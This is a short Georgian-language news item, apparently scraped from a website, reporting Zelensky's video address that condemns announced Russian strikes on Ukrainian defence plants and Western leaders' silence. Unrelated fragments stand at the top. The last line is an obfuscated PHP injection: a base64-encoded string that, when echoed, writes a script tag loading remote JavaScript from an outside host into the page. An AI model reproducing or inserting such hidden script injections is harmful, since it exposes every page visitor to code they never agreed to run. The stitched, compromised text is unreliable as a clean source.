celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი ვიდეო მიმართვაში იმედს გამოთქვამს, რომ თუნდაც ხვალ დასავლელი ლიდერები გამოხატავენ რეაგირებას დაბომბვებზე. "დაუფიქრდით მტრების დაუსჯელობის გრძნობას: ისინი აანონსებენ სიმხეცეს!"– განაცხადა პრეზიდენტმა.
 
მისი თქმით, რუსეთის ქმედებები "შეგნებული მკვლელობაა".
 
„ხვალისთის რუსეთმა ოფიციალურად დააანონსა ჩვენი ტერიტორიის, ჩვენი თავდაცვითი კომპლექსების წარმოებების დაბომბვა. მათი უმეტესობა, რომლებიც აშენებულია ათწლეულების წინ, კომუნისტური ხელისუფლების პერიოდში, განთავსებულია ქალაქებში. მათში ათასობით ადამიანი მუშაობს, ასობით ათასი ქარხნების გვერდით ცხოვრობს. ეს მკვლელობაა, შეგნებული მკვლელობა. და მე არ გამიგია რეაქცია მსოფლიოს არც ერთი ლიდერისგან ამასთან დაკავშირებით. დაუფიქრდით მტრების დაუსჯელობის გრძნობას: ისინი აანონსებენ დაგეგმილ სიმხეცეს. რატომ? იმიტომ, რომ არ არის რეაქცია. იმიტომ, რომ დუმილია. დასავლელი ლიდერები გაუჩინარდნენ. აგრესორის თავხედობა - ეს არის მკაფიო სიგნალი დასავლეთისთვის, რომ რუსეთის წინააღმდეგ გამოყენებული სანქციები არასაკმარისია“ , - განაცხადა ზელენსკიმ.
 
 
926
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");